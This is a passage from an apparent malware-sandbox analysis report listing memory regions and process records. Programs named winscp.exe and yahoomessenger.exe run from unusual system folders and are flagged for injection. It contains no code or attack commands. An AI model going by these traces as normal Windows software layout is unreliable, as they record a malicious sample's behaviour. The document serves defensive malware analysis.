"rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3983 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3984 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3985 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3986 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3987 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3988 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3989 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3990 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3991 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3992 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3993 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3994 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3995 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3996 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3997 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3998 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3999 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4000 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4001 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4002 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4004 start_va = 0xaa0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Thread: id = 190 os_tid = 0xa68 Process: id = "37" image_name = "winscp.exe" filename = "c:\\program files\\windowspowershell\\winscp.exe" page_root = "0x4cf44000" os_pid = "0xa6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\winscp.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4005 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4006 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4007 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4008 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4009 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 4010 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4011 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4012 start_va = 0x100000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 4013 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4014 start_va = 0x320000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4015 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4016 start_va = 0x560000 end_va = 0x6e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 4017 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4018 start_va = 0x710000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 4019 start_va = 0x950000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 4020 start_va = 0xa60000 end_va = 0xa76fff monitored = 0 entry_point = 0xa614a1 region_type = mapped_file name = "winscp.exe" filename = "\\Program Files\\WindowsPowerShell\\winscp.exe" (normalized: "c:\\program files\\windowspowershell\\winscp.exe") Region: id = 4021 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 4022 start_va = 0x1e80000 end_va = 0x1f5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4023 start_va = 0x1f60000 end_va = 0x2923fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 4024 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4025 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4026 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4027 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4028 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4029 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4030 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4031 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4032 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4033 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4034 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4035 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4036 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4037 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4038 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4039 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4040 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4041 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4042 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4043 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 4044 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4045 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4046 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4047 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4048 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4049 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4050 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4051 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4052 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4053 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4054 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4055 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4057 start_va = 0x2930000 end_va = 0x2a99fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002930000" filename = "" Thread: id = 191 os_tid = 0xa70 Process: id = "38" image_name = "yahoomessenger.exe" filename = "c:\\program files\\windows photo viewer\\yahoomessenger.exe" page_root = "0x4b44a000" os_pid = "0xa74" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Photo Viewer\\yahoomessenger.exe\" " cur_dir = "C:\\Program Files\\Windows Photo Viewer\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4058 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4059 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4060 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4061 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4062 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 4063 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4064 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4065 start_va = 0xe0000 end_va = 0x1befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4066 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4067 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4068 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4069 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4070 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4071 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4072 start_va = 0x980000 end_va = 0x996fff monitored = 0 entry_point = 0x9814a1 region_type = mapped_file name = "yahoomessenger.exe" filename = "\\Program Files\\Windows Photo Viewer\\yahoomessenger.exe" (normalized: "c:\\program files\\windows photo viewer\\yahoomessenger.exe") Region: id = 4073 start_va = 0x9a0000 end_va = 0xb27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 4074 start_va = 0xb30000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4075 start_va = 0xcc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 4076 start_va = 0x20c0000 end_va = 0x2a83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 4077 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4078 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4079 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4080 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4081 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4082 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4083 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4084 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4085 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4086 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4087 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4088 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4089 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4090 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4091 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4092 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4093 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4094 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4095 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4096 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 4097 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4098 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4099 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4100 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4101 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4102 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4103 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4104 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4105 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4106 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4107 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4108 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4110 start_va = 0x5f0000 end_va = 0x6fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Thread: id = 192 os_tid = 0xa78 Process: id = "39" image_name = "consent.exe" filename = "c:\\windows\\system32\\consent.exe" page_root = "0x335ae000" os_pid = "0xfc4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x364" cmd_line = "consent.exe 868 256 0000000003C074C0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d1f9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4593 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4594 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4595 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4596 start_va = 0x220000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4597 start_va = 